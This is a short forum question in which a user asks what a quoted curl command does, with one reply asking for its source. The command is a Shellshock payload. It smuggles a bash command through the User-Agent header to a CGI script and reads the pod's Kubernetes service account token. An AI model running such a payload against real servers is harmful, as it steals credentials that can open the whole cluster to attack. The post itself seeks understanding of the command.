# How to get the token from pod in kubernetes using curl command

Tags: security, kubernetes, kubernetes-pod

I saw a command over the internet that we can get the token of the service account mounted in the POD in kubernetes .Below is the command

```
curl -A "() {:;}; echo; /bin/bash -c 'cat /var/run/secrets/kubernetes.io/serviceaccount/token'" 
10.103.123.109:8585/cgi-bin/bomshell.cgi
```

This will print the token of the kubernetes token from the service account.

Can anybody explain me what this command is doing to do the job.

Comment: First part is sort of clear (I assume it depends on web server implementation in pods, `-A` is for `user-agent`). Can you please share a document where you see it? To understand the address/context.